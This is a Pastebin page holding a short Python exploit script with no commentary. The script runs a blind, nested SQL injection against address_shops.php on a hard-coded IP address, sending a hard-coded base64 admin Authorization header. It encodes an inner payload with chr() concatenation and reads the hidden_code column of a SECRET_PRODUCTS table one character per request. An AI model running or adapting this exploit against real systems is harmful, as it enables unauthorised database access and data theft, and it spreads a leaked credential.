SHARE
TWEET

Untitled

a guest Jan 27th, 2014 156 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2. import requests
  3. import re
  4. import sys
  5.  
  6. def enc(text):
  7.         return '||'.join(map(lambda x : 'chr(%s)' % ord(x), list(text)))
  8.  
  9. def pwn(cmd):
  10.         url = "http://195.133.87.173/address_shops.php?debug=1&city=xxx''%s') as branch from dual -- " % cmd
  11.         r = requests.get(url, headers = {'Authorization' : 'Basic YWRtaW46UEBzc3cwcmQ5ODIzXyNAIWhocXF5aQ=='}).content
  12.         return r
  13.  
  14. for i in xrange(1, 100):
  15.         html = pwn(" and 1=0 union all select cast((select PHD_IV_OWNER2.shop_private_pkg.GET_PRODUCT_QUANTITY(%s) from dual) as varchar(1000)) from dual -- " % enc("x' union all select ascii(substr(hidden_code,%s,1)) from SECRET_PRODUCTS where hidden_code is not null -- " % i))
  16.         m = re.search('<tr>(\d+)</tr>', html, re.DOTALL)
  17.         if m:
  18.                 sys.stdout.write(chr(int(m.group(1))))
  19.         else:
  20.                 break
RAW Paste Data
Pastebin PRO Autumn Special!
Get 40% OFF on Pastebin PRO accounts!
Top